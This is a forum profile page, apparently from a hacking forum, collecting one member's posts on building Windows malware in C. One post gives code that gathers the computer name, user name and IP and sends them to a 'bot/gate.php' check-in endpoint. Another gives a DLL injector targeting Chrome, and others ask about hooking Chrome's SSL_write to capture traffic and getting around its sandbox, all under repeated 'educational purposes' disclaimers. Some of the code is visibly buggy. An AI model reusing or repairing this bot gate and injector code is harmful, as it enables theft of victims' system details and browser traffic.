Jump to content

StoneIce

Members
  • Posts

    26
  • Joined

  • Last visited

About StoneIce

  • Birthday 02/06/1989

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

StoneIce's Achievements

Newbie

Newbie (1/14)

10

Reputation

  1. Ok This Code sends data from the application to the php page, Tested and works Ok. but the char* ip sends blank data , been wondering why it behaves so. It sends the computer as well as the computer User name to the server , but the IP it does not, i am wondering if someone could give me a hand to print characters from a char function. Everything coded here is strictly for educational purposes. Code looks like this //#include "stdafx.h" #include <stdio.h> #include <windows.h> #include <string.h> #include <Wininet.h> #define GET 0 #define localhost Host #pragma comment(lib,"wininet") #pragma comment(lib,"urlmon") char* ip(); char* myHwid(); char* myip = ip(); char* comp = getenv("COMPUTERNAME"); char* user = getenv("USERNAME"); char* ip () { HINTERNET hInternet , hFile; DWORD rSize; char ipv4[50]; hInternet = InternetOpen(NULL,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0); hFile = InternetOpenUrlA(hInternet,"http://housenaija.com/ip/ip.php",NULL,0,INTERNET_FLAG_RELOAD,0); InternetReadFile(hFile,&ipv4,sizeof(ipv4),&rSize); ipv4[rSize] ='\0'; InternetCloseHandle(hFile); InternetCloseHandle(hInternet); } void Request(int Method, LPCSTR Host, LPCSTR url, LPCSTR header, LPSTR data) { HINTERNET internet = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0); HINTERNET connect = InternetConnectA(internet, Host, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0); HINTERNET request = HttpOpenRequestA(connect, GET, url, "HTTP/1.1", NULL, NULL, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS | INTERNET_FLAG_NO_AUTH | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_UI | INTERNET_FLAG_PRAGMA_NOCACHE | INTERNET_FLAG_RELOAD, NULL); if(request != NULL) { int datalen = 0; if(data != NULL) datalen = strlen(data); int headerlen = 0; if(header != NULL) headerlen = strlen(header); //http://msdn.microsoft.com/en-us/library/windows/desktop/aa384247%28v=vs.85%29.aspx HttpSendRequestA(request, header, headerlen, data, datalen); //http://msdn.microsoft.com/en-us/library/windows/desktop/aa384350%28v=vs.85%29.aspx InternetCloseHandle(request); } InternetCloseHandle(internet); } void sendpcInfo() { char URL[1024]; char* geturi = "bot/gate.php?myip=%s&comp=%s&compUser=%s"; wsprintfA(URL,geturi,myip,comp,user); Request(GET,"localhost",URL,NULL,NULL); MessageBoxA(NULL,"Sent!","",MB_OK); } int main() { sendpcInfo(); system("pause"); }
  2. Yea boss. See what I mean here. When you talked about "binary find" , that is what I have been sourcing for. The source code for NetRipper I have downloaded. And studied to a level that I was able to get to now. Thanks for your help again, you the boss @Nytro
  3. Hello everyone and thanks for your help on here. I am most grateful for everything Today I wanted to try out something again I have been playing with for sometime, finding out ssl_write from chrome.dll I figured out that ssl_write is a static function and as such cannot be found via the names / modules easily. I have done nearly everything, hence e I don't see the ssl_write function. this made me feel bad, not that I don't know what am doing, but am trying to see things inside the disassembler, ollydbg / IDA. Anyone with a tut? Would be appreciated.
  4. Then after that I just assign the namez, to use the getname() function?
  5. Morning every one Today I started playing around with memory allocation in C /c++. Now I wanted to do something like this, using a function as a character (passing a function to a character to perform assignment) hence I decided to try something like this. I don't see the response, do I appear to be doing this correctly #include <stdio.h> #include <stdlib.h> char* getname() { char* fname[35] ="Shawn Little"; fname = (char*)malloc(35*sizeof(char)); } int main() { char namez[50]; namez = (char*) malloc(50*sizeof(char)); ZeroMemory(namez,50*sizeof(char)); namez = getname(); return 0; } Need advise here as this is the first time doing this am typing from my BlackBerry.
  6. Good evening I been playing around with SSL_Write Chrome today, so i decided to try to hook and save buf for SSL_Write, but i dont see the buffer data, i just dont see the data in text file Edits
  7. @Nytro then I inject into chrome and I don't get to see the dll in process explorer? I did the same using several injection methods, it didn't even behave like there was a dll injected into the process, when I even checked I didn't see the dll in the process explorer. maybe you can check the dll injector I sent you to see things for yourself. I got confused along the line and that's why I have been asking questions even saw somewhere on cheat engine where someone had the same problem and the suggestion was to take away sandbox for testing. now that was where my heavyweight confusion started.
  8. Hi and good morning everyone, This post is strictly for educational purposes and no harm intended. I really wanted to share experiences of late with Google Chrome and sandbox, making it impossible to inject any dll whatsoever into the process I removed sandbox and it sure did inject without further I dos. Now I see people going about talking about Sandbox and how it's almost impossible to inject chrome and even the source code I put on here proved abortive along the line. Contemplating using the code cave injection method, do you think it works? Just wanted to see experienced people with the same problems. No offence, just need to know as they say people in the dark don't see unless they have a lamp.
  9. lemme work on it and get back to you fellows. thanks a million all of you
  10. @MrGrj, Free() I think that should be it.
  11. @MrGrj, lemme give it a try and get back to you
  12. it returns the path inside the IDE upon debug. c//...//(x86) Chrome //Application//chrome.exe that's what I see
  13. still gives me the same access violation error. When I remove it it tells me debug failure. unknown error.
  14. Morning everyone, Mainly for educational purposes, hence I wonna discuss something like this on here, been trying to inject into chrome hence gave me some problems, but here is one of my sources I wanted pros on here to have a good look at. Some parts of this code was gotten from rohan from msdn. Credits should be given to him. When I inject it into chrome for instances, it opens the strcat.asm something like this A debug view on my visual studio, doesn't give me errors, on the code, started to wonder what went wrong Code looks like this #include "stdafx.h" #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> int main (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { char chrome[260]; char *dll = "C:\\Users\\Emi\\Desktop\\akrikaht.dll"; GetEnvironmentVariable("programfiles",chrome,sizeof(chrome)); strcat(chrome,"Google\\Chrome\\Application\\chrome.exe"); //shows error at strcat, opens strcat.asm strcpy(dll,lpCmdLine); STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si,sizeof(si)); ZeroMemory(?,sizeof(pi)); HANDLE baseAddress = VirtualAllocEx (pi.hProcess,NULL, 265, MEM_COMMIT,PAGE_READWRITE) ; WriteProcessMemory(pi.hProcess,baseAddress,dll,sizeof(dll),NULL); CreateRemoteThread(pi.hProcess, NULL,0,(LPTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle("kernel32"),"LoadLibraryA"),baseAddress,0,NULL); Sleep(100) ; TerminateThread(pi.hThread,0); printf("Injected \n"); getchar(); return 0; } Just trying to understand what the problem really is. Someone pls help.
×
×
  • Create New...